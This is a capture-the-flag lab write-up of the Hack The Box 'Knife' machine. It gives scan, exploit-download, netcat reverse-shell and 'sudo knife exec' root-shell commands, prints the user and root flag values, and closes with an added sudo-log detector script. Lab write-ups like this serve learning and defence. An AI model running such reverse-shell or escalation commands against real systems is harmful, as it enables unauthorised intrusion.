
HACK THE BOX MACHINE

KNIFE

Project Report

CERTIFIED IT INFRASTRUCTURE & CYBER SOC ANALYST

Submitted By

KAILAS.V
PENETRATION TEST METHODS

• SCANNING
• ENUMERATION
• EXPLOITATION
• PRIVILEGE ESCALATION

1. SCANNING

In the Hack The Box Knife machine, the given IP address is 10.10.10.242.

I did an nmap scan to find the ports using the command
sudo nmap -sS -A -Pn 10.10.10.242
2. ENUMERATION

I opened port 80 and it opened a website, but there was nothing to do.
I found that PHP 8.1.0 is vulnerable, and I searched for an exploit
for PHP 8.1.0 and found a Python program file for exploitation.

I downloaded the exploitation file by using the following command and
named it file.py
wget https://www.exploit-db.com/raw/49933
3. EXPLOITATION
Then I ran the exploitation file using the command
python3 file.py

After doing this I got into the machine but could not do anything, so I
used another application called NETCAT using the command
nc -nlvp 1234
Then, using the previous terminal in which Python was running, I
entered the following code.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.75 1234 >/tmp/f

On the other tab this was running


I looked in the home directory and found James; inside of James I found the
user flag
‘3996b98220f1bb8b675640e9f5086408’

4. PRIVILEGE ESCALATION
I tried to get root access using the command
sudo /usr/bin/knife exec --exec "exec '/bin/bash -i'"

Now I got the root access and the root flag


‘1ce3e62bc3d0600f691e21eb4a41a411’

Finally the machine knife was hacked.
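
A defender's view of step 4, as an added example that is not part of the original report: a small detector that reads sudo entries from an auth log and flags root-level commands that hand out code execution, such as the knife exec call above. The log lines, hostname and timestamps are constructed, the standard syslog sudo format is assumed, and the rule set is an illustrative assumption.

```python
import os
import re

# Constructed sample in syslog/auth.log sudo format (not from the original report).
SAMPLE_LOG = """\
Jun  1 10:02:11 knife sudo:    james : TTY=pts/0 ; PWD=/home/james ; USER=root ; COMMAND=/usr/bin/knife node list
Jun  1 10:05:40 knife sudo:    james : TTY=pts/0 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/knife exec --exec exec '/bin/bash -i'
Jun  1 10:07:03 knife sudo:    admin : TTY=pts/1 ; PWD=/root ; USER=root ; COMMAND=/usr/bin/apt update
Jun  1 10:09:27 knife sshd[811]: Accepted publickey for admin from 192.0.2.10 port 50022 ssh2
"""

SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+) : .*?USER=(?P<runas>\S+) ; COMMAND=(?P<command>.+)$"
)
SHELLS = {"sh", "bash", "dash", "zsh"}  # assumed list of shells to watch for


def classify(command):
    """Return the reasons a sudo command line gives the caller code execution."""
    tokens = command.split()
    reasons = []
    # 'knife exec' runs Ruby supplied by the caller, so sudo rights on knife
    # are equivalent to an unrestricted root shell.
    if os.path.basename(tokens[0]) == "knife" and tokens[1:2] == ["exec"]:
        reasons.append("knife exec runs caller-supplied Ruby")
    # sudo logs arguments joined by spaces, so quotes can remain on tokens.
    for tok in tokens[1:]:
        if os.path.basename(tok.strip("'\"")) in SHELLS:
            reasons.append("argument references a shell")
            break
    return reasons


def find_suspicious(log_text):
    """Scan log text and return flagged sudo events executed as root."""
    hits = []
    for line in log_text.splitlines():
        m = SUDO_RE.search(line)
        if not m or m.group("runas") != "root":
            continue
        reasons = classify(m.group("command"))
        if reasons:
            hits.append({**m.groupdict(), "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(hit["user"], "->", hit["command"], "|", "; ".join(hit["reasons"]))
```

The underlying fix is in sudoers rather than in detection: an account that does not need knife as root should not have a sudo rule for it.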
